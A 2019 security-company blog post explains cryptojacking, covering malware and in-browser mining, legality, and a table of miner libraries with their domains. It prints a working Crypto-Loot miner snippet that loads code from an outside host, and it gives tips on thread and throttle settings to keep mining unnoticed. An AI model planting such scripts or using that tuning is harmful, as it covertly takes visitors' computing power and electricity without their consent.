Fluid Attacks logo
Contact Us
Young hacker smiling
Zero false positives

Expert intelligence + effective automation

Contact logo Contact Us
GET A DEMO
CPU Usage. Photo by Alberto Duo on Unsplash: https://unsplash.com/photos/e4rcg33x4fA

Cryptojacking, a real malware?

Understanding cryptojacking "malware".
This time, we will provide you with an explanation of the different types of cryptojacking. You will be able to see an example and its basic configuration. You will also get to know the legal use of cryptojacking and advantages of implementing it in an application.
User icon Diego Alvarez
Folder icon documentation
Calendar icon

2019-08-25



Before discussing the concept, we need a brief definition of blockchain. It is simply a unique, consensual, and distributed registry on the network that allows storage of information that cannot be modified, lost or deleted. It is used in the health sector, smart contracts, intellectual property management, and cryptocurrencies, the latter being the most used.

In the field of cryptocurrencies, a blockchain stores all transactions made with a cryptocurrency. The security and integrity of these systems are maintained by nodes, which are computers connected to the blockchain network competing with each other to verify transactions. This process is known as mining and is carried out by providing processing power with either CPUs, GPUs, or using specialized hardware for this type of tasks.

Usually nodes associate with each other and create groups that working together help to validate a group of transactions. when these transactions are validated, each node is rewarded with the proportion of the power contributed.

Concept

When mining cryptocurrency take into account that in these processes, the percentage of GPU or CPU usage increases, as well as, the use of electricity.

Now, what if I tell you that others can perform such processing power for you, and even better, without having to divide the profits between them. It sounds pretty good, and it’s simple to implement with two variations.

  • The first is carried out by infecting a victim’s machine with a malware. Usually, this is done by social engineering. We can make a victim, without their knowledge, download malware that executes the mining process in the background.

  • The other variation is in-browser mining. This executes code in the user’s browser when the user is accessing a particular site. In this case, JavaScript is used to execute such scripts.

Discussion

Some people prefer that their CPU be used 100% of the time, without having to deal with ads and pop-ups on every new page.

On the other hand, antivirus companies periodically update their definition of malware, and include web miners as a potential threat to a user’s system.

According to cointelegraph[1], Monero, the currency most affected by excessive mining, plans to reinforce its algorithm by requiring miners to dedicate over two gigabytes of RAM to the process, which could make cryptojacking attempts harder to hide.

The use of these scripts defines whether it is legal or not. There are cases where attackers inject code into websites through XSS, generating profits, and of course, without the consent of the website administrator.

As noted above, with social engineering techniques, the attacker could make victims download malicious programs to perform mining without consent.

Tools

There are many tools that can be used to perform in-browser mining. Conhive had been one of the most used, but since March 2019 it has stopped working.

However, there are other tools that are quite similar. Table 1 below, a scan made with publicWWW, shows the approximate number of websites using these tools.

Table 1. Quantity of websites per library[2]
Website Results Query Parameter

Coinhive

30611

"coinhive.min.js"

JSEcoin

1131

"load.jsecoin.com"

Crypto-Loot

695

"CryptoLoot.Anonymous"

Minr

324

"minr.pw", "st.kjli.fi", "abc.pema.cl", "metrika.ron.si", "cdn.rove.cl", "host.d-ns.ga", "static.hk.rs", "hallaert.online", "cnt.statistic.date", "cdn.static-cnt.bid"

CoinImp

317

"www.coinimp.com/scripts/min.js"

ProjectPoi (PPoi)

116

"projectpoi.min"

AFMiner

46

"afminer.com/code/miner.php"

Papoto

42

"papoto.com/lib/papoto.js"

In the following example, a test is shown using Crypto Loot, a library that is replacing the previous Coinhive. It is very easy to implement in any application by inserting the following code.

In-Browser mining script
1
2
3
4
5
6
7
<script src="//statdynamic.com/lib/crypta.js"></script>
<script>
  var miner = new CRLT.Anonymous('15837bc7758859e913c5ccc2d292a9f1e54775389d5',
    { threads:4,throttle:0.2, coin: "xmr" }
  );
  miner.start();
</script>

When a user visits the application, the processing level increases very fast. The recommended thread value to make the script unnoticed is between 2-4. And the throttle that defines the maximum CPU usage is at 0.2 (80%), the full speed being 0.0, and the least recommended.

CPU Usage
Figure 1. CPU Usage while visiting a website with In-Browser mining script.

Collected earnings and processing power can be seen on the dashboard of the person who inserted the script.

Conclusion

The use of this type of service, such as Crypto Loot, can be legal. They are considered malware when used anonymously in users' systems. It is our responsibility to inform users about what is happening and provide statistics to users on mined power.

In order for these mining methods to be legitimate and therefore, legal, users must receive a notification about the execution of these scripts, as well as the option to disable them and stop mining.

So far, there are few websites where the user is not actually informed of the use of these scripts. Here is where antivirus companies disagree. Some antivirus companies believe excessive CPU usage can cause intentional damage, while others believe there is no intention to harm an infected machine’s files; they just make the machine work a little slower.

Without a doubt, no one wants their machine to work slower, but with proper configuration of the scripts, you can achieve a website that generates profits without having to show annoying ads to visitors and without exceeding CPU usage.

References

  1. cointelegraph. Monero Developers Consider Adopting New Proof-of-Work Algorithm in October.

  2. S. Eskandari, A. Leoutsarakos, T. Mursch and J. Clark (2018). How to measure anything in cybersecurity risk. A first look at browser-based cryptojacking. 2018 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), 63.


Author picture

Diego Alvarez

Systems and Telecommunications Engineer student

"Blessed is the man who expects nothing, because he will never be disappointed." Alexander Pope



Related




Service status - Terms of Use